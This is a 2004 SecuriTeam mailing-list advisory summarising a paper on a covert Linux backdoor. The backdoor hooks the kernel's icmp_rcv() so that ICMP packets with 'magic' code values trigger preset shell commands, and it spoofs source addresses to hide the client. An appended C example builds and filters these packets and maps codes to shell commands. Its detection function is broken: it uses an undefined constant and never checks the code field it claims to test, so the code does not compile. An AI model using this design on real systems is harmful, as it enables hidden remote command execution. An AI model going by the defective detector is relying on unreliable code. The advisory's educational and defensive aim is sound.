[REVS] How To Create An ICMP Based Client/Server Connection Backdoor
From: SecuriTeam (support_at_securiteam.com)
Date: 03/17/04
To: list@securiteam.com Date: 17 Mar 2004 18:41:07 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
How To Create An ICMP Based Client/Server Connection Backdoor
------------------------------------------------------------------------
SUMMARY
This paper introduces a covert ICMP communication channel built by hooking
the Linux kernel's ICMP receive function, icmp_rcv() (a kernel protocol
handler, not a system call, although the paper describes the hook as a
"syscall hook"). With this technique it is possible to run a client/server
channel without opening any port on the remote system. Basic knowledge of C
and of kernel function hooking is required.
DETAILS
Abstract:
This technique opens a client/server channel, without opening any port, by
creating a dialog of the form:
Client -> Filter -> Interpreter
The filter hooks the kernel's icmp_rcv() function, so that every received
ICMP packet is first inspected by the filter, which compares the packet's
"code_no" (the ICMP code field) against a preset list of MAGIC CODES. Based
on the "code_no" received, the filter invokes the interpreter, which resides
in user space, through an execve() call, so that the required action is
executed with the environment associated to the corresponding MAGIC CODE.
The client itself is not really important: it only automates the
construction of the ICMP packets and of their "code_no" behind a simple
prompt, nothing that a generic packet generator could not do. On the remote
host the channel leaves no listening socket and no application log, and the
source IP address is spoofed through the raw ICMP socket used for sending, so
the host itself cannot trace the traffic back to the client; the ICMP packets
are still visible to a packet capture or a network IDS on the path.
Unfortunately the commands that can be executed on the remote system are
limited to those bound to the MAGIC CODES stored in the interpreter; there is
no bound shell.
The code examples are well documented and show the creation of a simple
client/server pair communicating via ICMP packets.
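As an added example (not code from the paper or from SecuriTeam), the C program below shows the two ends of the dispatch described above in user space: build_icmp_request() is what the client puts on the wire, an ICMP echo request whose code field carries the command selector and whose checksum is valid, and filter_icmp() is the decision the hooked icmp_rcv() has to make, verifying the checksum and comparing the code against the MAGIC CODE table before naming the command for the interpreter. The magic values, the command strings and the "ping" payload are constructed for this example; the kernel-side hook itself is not shown because it depends on the kernel version. echo_code_anomaly() is the defender's view of the same bytes: RFC 792 fixes the code of an echo request at 0, so a non-zero code is detectable on the wire whatever the spoofed source address says.

```c
/*
 * Added example, not code from the original paper: the two ends of the
 * "magic code" dispatch in user space. The magic values, command strings
 * and sample payload are constructed here.
 * Build: cc -std=c99 -Wall icmp_magic.c -o icmp_magic
 */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define ICMP_ECHO_REQUEST 8
#define ICMP_HDR_LEN      8   /* type, code, checksum, id, seq (RFC 792) */

/* Preset MAGIC CODE table (assumed values): ICMP code -> interpreter command. */
struct magic_entry { uint8_t code; const char *command; };
static const struct magic_entry magic_table[] = {
    { 0x37, "/bin/sh -c 'id > /tmp/.out'" },
    { 0x42, "/bin/sh -c 'cat /tmp/.out'" },
    { 0x5a, "/bin/rm -f /tmp/.out" },
};
#define MAGIC_COUNT (sizeof magic_table / sizeof magic_table[0])

/* Internet checksum (RFC 1071) over the whole ICMP message, big-endian words.
 * Over a message whose checksum field is already correct it returns 0. */
uint16_t icmp_checksum(const uint8_t *data, size_t len)
{
    uint32_t sum = 0;
    for (; len > 1; data += 2, len -= 2)
        sum += (uint16_t)((data[0] << 8) | data[1]);
    if (len)                               /* odd trailing byte, zero padded */
        sum += (uint16_t)(data[0] << 8);
    while (sum >> 16)                      /* fold the carries back in */
        sum = (sum & 0xffff) + (sum >> 16);
    return (uint16_t)~sum;
}

/* Client side: write an ICMP echo request carrying `code` into buf.
 * Returns the message length, or 0 if buf is too small. */
size_t build_icmp_request(uint8_t *buf, size_t bufsize, uint8_t code,
                          uint16_t id, uint16_t seq,
                          const uint8_t *payload, size_t payload_len)
{
    size_t len = ICMP_HDR_LEN + payload_len;
    if (bufsize < len)
        return 0;
    buf[0] = ICMP_ECHO_REQUEST;
    buf[1] = code;                         /* the command selector */
    buf[2] = buf[3] = 0;                   /* checksum is computed over zeros */
    buf[4] = id >> 8;  buf[5] = id & 0xff;
    buf[6] = seq >> 8; buf[7] = seq & 0xff;
    if (payload_len)
        memcpy(buf + ICMP_HDR_LEN, payload, payload_len);
    uint16_t sum = icmp_checksum(buf, len);
    buf[2] = sum >> 8; buf[3] = sum & 0xff;
    return len;
}

/* Filter side: return the command the interpreter should run, or NULL when
 * the message is not for us and must fall through to the normal icmp_rcv(). */
const char *filter_icmp(const uint8_t *msg, size_t len)
{
    if (len < ICMP_HDR_LEN || icmp_checksum(msg, len) != 0)
        return NULL;                       /* truncated or corrupted: ignore */
    if (msg[0] != ICMP_ECHO_REQUEST)
        return NULL;                       /* only echo requests carry codes */
    for (size_t i = 0; i < MAGIC_COUNT; i++)
        if (magic_table[i].code == msg[1])
            return magic_table[i].command;
    return NULL;                           /* an ordinary ping */
}

/* Defender's view: RFC 792 fixes the code of an echo request at 0, so a
 * non-zero code is a wire-level signature of this channel. */
int echo_code_anomaly(const uint8_t *msg, size_t len)
{
    return len >= ICMP_HDR_LEN && msg[0] == ICMP_EFHO_REQUEST_PLACEHOLDER;
}
```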
ADDITIONAL INFORMATION
The information has been provided by evil <mailto:evil@blackangels.it>.
The complete paper can be found at:
http://www.blackangels.it/Files/Papers/icmprcv.txt